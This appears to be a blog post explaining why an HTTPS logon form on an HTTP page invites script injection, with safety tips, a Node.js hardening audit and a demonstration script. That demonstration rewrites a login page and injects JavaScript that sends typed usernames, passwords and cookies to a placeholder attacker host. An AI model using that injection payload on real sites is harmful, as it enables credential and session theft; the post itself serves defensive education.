Ok, so I saw this on Twitter and I decided to take a look at it:
The response from EnglishNationalOpera was amazing, I couldn’t believe it:
Now, you are probably thinking “What’s going on?” It’s simple: EnglishNationalOpera does not understand the risk of putting an HTTPS logon form on a page that is itself loaded over HTTP.
Serving an HTTPS logon form on an HTTP page leaves the website and its visitors open to script injection. The page that contains the form travels in the clear, so anyone between the visitor and the server (on the same Wi-Fi, at the ISP, anywhere on the path) can alter it before it arrives: change where the form posts, or add a script that captures the password as it is typed. The padlock on the form’s submit URL protects nothing, because the attacker’s script runs before the form is ever submitted. The result is the same as an XSS attack. XSS (short for Cross Site Scripting) means attacker-supplied script that executes in the victim’s web browser in the context of a site the victim trusts, and performs a malicious action there.
Most of the time, attackers who exploit XSS try to steal the victim’s cookies. A cookie (if you don’t know) is a small piece of data a site stores in your browser; the one that matters here is the session cookie, which holds the session ID, and whoever holds a valid session ID is logged in as that user without needing the password (badly built sites have even been known to store usernames and passwords in cookies). Other common goals are redirecting the victim to a malicious website, or, as in the case above, capturing the credentials as they are typed into the logon form.
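To make the risk concrete, here is an added example (not from the original post, and not code from EnglishNationalOpera) of the two things an attacker sitting on the network path can do to a logon page that arrives over plaintext HTTP, even though its form posts to https://. The page, the site name (`example-opera.test`) and the collection host (`collector.attacker.test`) are constructed for illustration. It runs under Node.js with no dependencies; the injected script itself only runs in a browser.

```javascript
// Added example: how an on-path attacker rewrites a login page delivered over http://.
// All hosts and page content here are constructed placeholders, not a real site.

// A constructed login page of the kind the post describes: fetched over http://,
// form posting to https://. The browser cannot tell whether this page was altered in transit.
const ORIGINAL_PAGE = `<!DOCTYPE html>
<html><head><title>Sign in</title></head>
<body>
<form id="login" method="post" action="https://www.example-opera.test/account/login">
  <input name="username"><input name="password" type="password">
  <button type="submit">Sign in</button>
</form>
</body></html>`;

// Hypothetical attacker-controlled collection point (assumption, not a real host).
const ATTACKER_HOST = 'http://collector.attacker.test';

// Script the attacker splices into the plaintext page. In the victim's browser it runs in
// the site's own origin, exactly like an XSS payload: when the form is submitted it copies
// the username, password and document.cookie to the attacker, then lets the real login
// proceed so the victim notices nothing.
const INJECTED_SCRIPT = `<script>
document.addEventListener('submit', function (e) {
  var f = e.target;
  var leak = encodeURIComponent(f.username.value + ':' + f.password.value + ':' + document.cookie);
  (new Image()).src = '${ATTACKER_HOST}/c?d=' + leak;
});
</script>`;

// Two rewrites an attacker on the path can apply to the plaintext response.
function rewritePlaintextResponse(html) {
  // 1. Downgrade: point the form at http:// so the credentials travel unencrypted.
  //    The "https form on an http page" design makes this a one-line edit.
  const downgraded = html.replace(/action="https:\/\//g, 'action="http://');
  // 2. Inject: add the credential-stealing script just before </body>.
  return downgraded.replace('</body>', INJECTED_SCRIPT + '\n</body>');
}

// Helpers a tester can use to compare what was sent with what arrived.
function formActions(html) {
  return [...html.matchAll(/<form[^>]*action="([^"]+)"/g)].map(m => m[1]);
}
function hasInjectedScript(html) {
  return html.includes(ATTACKER_HOST);
}

// Demonstration.
const tampered = rewritePlaintextResponse(ORIGINAL_PAGE);
console.log('original form posts to:', formActions(ORIGINAL_PAGE));
console.log('tampered form posts to:', formActions(tampered));
console.log('injected script present:', hasInjectedScript(tampered));
```

Nothing in the browser flags either rewrite: the visitor typed an http:// address, got an http:// page, and the padlock they might have expected on the form never applied to the page that carries it.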
How dangerous is XSS?
Well, let’s put it this way: Facebook and other companies pay bounties (money) to people who find and report XSS vulnerabilities, and XSS is consistently among the most common flaws found when websites are tested, turning up in a large share of the sites examined.
How can I avoid XSS attacks?
- Don’t click on random links on social media websites (Facebook in particular is a favourite place for phishing links).
- Try to avoid shortened or obfuscated links (such as bit.ly or adf.ly), since you cannot see where they lead before you click.
- If you see a website with a logon form on an http:// address, report it to the website owner or host.
- If you own a website, make sure that everything is loaded over HTTPS (even your advertisements, if you have any). Some injection attacks come through compromised adverts: an advert tag loaded over HTTP can be altered in transit, and because the ad script runs inside your page, it can do anything to your page that XSS could.
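The last two points above are the ones a tester or site owner can actually check. Here is an added example (not from the original post, and not EnglishNationalOpera’s code) of a small audit over a captured logon-page response, alongside the response headers a hardened version of the same page should send. The weak and fixed responses, the site name (`example-opera.test`) and the ad network host are constructed placeholders; it runs under Node.js with no dependencies.

```javascript
// Added example: audit a login page response for the problems described above,
// and show the hardened headers. Sample responses and hosts are constructed.

// Returns a list of findings a tester would report back to the site owner.
function auditLoginResponse({ url, headers, html }) {
  const findings = [];
  // Normalise header names so the check does not depend on the server's casing.
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));

  if (!url.startsWith('https://')) {
    findings.push('login page itself is served over http: anyone on the path can rewrite the form or inject script');
  }
  // A form posting to http:// sends the credentials in the clear.
  for (const m of html.matchAll(/<form[^>]*action="([^"]+)"/g)) {
    if (m[1].startsWith('http://')) findings.push(`form posts credentials in the clear to ${m[1]}`);
  }
  // Mixed active content: any plaintext script or frame (advert tags included) can be
  // altered in transit and then runs with full access to the page.
  for (const m of html.matchAll(/<(script|iframe)[^>]*src="(http:\/\/[^"]+)"/g)) {
    findings.push(`active content loaded over http: ${m[2]}`);
  }
  // Without HSTS the browser will still happily fetch http:// URLs for this host.
  if (!h['strict-transport-security']) {
    findings.push('no Strict-Transport-Security header: browsers will still accept http:// for this host');
  }
  // Cookie flags: Secure keeps the cookie off plaintext connections, HttpOnly keeps it away from script.
  const cookies = [].concat(h['set-cookie'] || []);
  for (const c of cookies) {
    const name = c.split('=')[0];
    if (!/;\s*secure/i.test(c)) findings.push(`cookie ${name} lacks Secure: it will be sent over http`);
    if (!/;\s*httponly/i.test(c)) findings.push(`cookie ${name} lacks HttpOnly: injected script can read it`);
  }
  return findings;
}

// Headers for the hardened version of the login response.
function hardenedLoginHeaders(sessionId) {
  return {
    // Tell the browser to use https:// for this host for a year, subdomains included.
    'Strict-Transport-Security': 'max-age=31536000; includeSubDomains',
    // Only load our own resources, and upgrade any leftover http:// references to https://.
    'Content-Security-Policy': "default-src 'self'; upgrade-insecure-requests",
    // Session cookie never leaves over plaintext and is invisible to script.
    'Set-Cookie': [`session=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Lax`],
  };
}

// Constructed weak response of the kind the post complains about: http:// page,
// https:// form, plaintext advert tag, unflagged session cookie, no HSTS.
const WEAK = {
  url: 'http://www.example-opera.test/login',
  headers: { 'Set-Cookie': ['session=abc123; Path=/'] },
  html: '<form action="https://www.example-opera.test/login" method="post"></form>' +
        '<script src="http://ads.example-network.test/tag.js"></script>',
};

// The same page served properly.
const FIXED = {
  url: 'https://www.example-opera.test/login',
  headers: hardenedLoginHeaders('abc123'),
  html: '<form action="https://www.example-opera.test/login" method="post"></form>' +
        '<script src="https://ads.example-network.test/tag.js"></script>',
};

console.log('weak:', auditLoginResponse(WEAK));
console.log('fixed:', auditLoginResponse(FIXED));
```

The audit is deliberately string-based so it can run over a saved response from any HTTP client; it is a quick check, not a replacement for a browser’s mixed-content warnings or a full scan, but it catches exactly the configuration in the post.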
An example of an XSS attack is shown here. Note that the link you see there is safe and non-malicious.
XSS should not be underestimated. In 2005 the Samy worm, an XSS worm on MySpace, spread to over one million profiles in under a day. It did not infect PCs: it ran entirely inside the browser, adding itself to the profile of every user who viewed an infected one, which is exactly what makes XSS so dangerous. That worm raised awareness of XSS in the web security community, but the number of XSS attacks is still growing, which is why we need everyone to be aware of it.
Note that clearing your cookies, form data and history regularly limits how long a stolen session cookie stays usable, but it does not stop XSS itself; logging out of sites when you are finished (which invalidates the session) does more to protect you.
Thanks to Troy Hunt, who taught me about XSS through his YouTube videos here.